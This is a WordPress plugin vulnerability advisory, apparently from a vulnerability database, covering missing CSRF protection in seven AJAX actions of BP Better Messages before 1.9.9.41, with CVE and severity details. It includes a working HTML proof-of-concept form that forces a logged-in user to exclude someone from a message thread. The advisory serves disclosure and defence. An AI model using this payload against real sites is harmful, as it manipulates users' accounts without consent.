WordPress Plugin Vulnerabilities

BP Better Messages < 1.9.9.41 - Multiple CSRF

Description

The plugin does not check for CSRF in multiple of its AJAX actions: bp_better_messages_leave_chat, bp_better_messages_join_chat, bp_messages_leave_thread, bp_messages_mute_thread, bp_messages_unmute_thread, bp_better_messages_add_user_to_thread, bp_better_messages_exclude_user_from_thread. This could allow attackers to make logged in users do unwanted actions

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="bp_better_messages_exclude_user_from_thread" />
      <input type="hidden" name="user_id" value="4" />
      <input type="hidden" name="thread_id" value="3" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
bp-better-messages
Fixed in 1.9.9.41

References

CVE
CVE-2021-24809
URL
https://plugins.trac.wordpress.org/changeset/2605772/bp-better-messages/trunk/inc/ajax.php

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Brandon Roldan
Submitter
Brandon Roldan
Submitter twitter
tomorrowisnew_
Verified
Yes
WPVDB ID
e186fef4-dca0-461f-b539-082c13a68d13

Timeline

Publicly Published
2021-10-04 (about 2 years ago)
Added
2021-10-04 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)

Other

Published
Title
Published
2024-02-12
Title
Multi Step Form < 1.7.19 - Form Deletion via CSRF
Published
2024-03-29
Title
Woocommerce Social Media Share Buttons <= 1.3.0 - Cross-Site Request Forgery to Cross-Site Scripting
Published
2023-02-28
Title
HT Politic < 2.3.8 - Arbitrary Plugin Activation via CSRF
Published
2023-03-08
Title
HT Easy GA4 ( Google Analytics 4 ) < 1.0.7 - Plugin Activation via CSRF
Published
2023-04-03
Title
Custom Post Type UI < 1.13.5 - Debug Info Sending via CSRF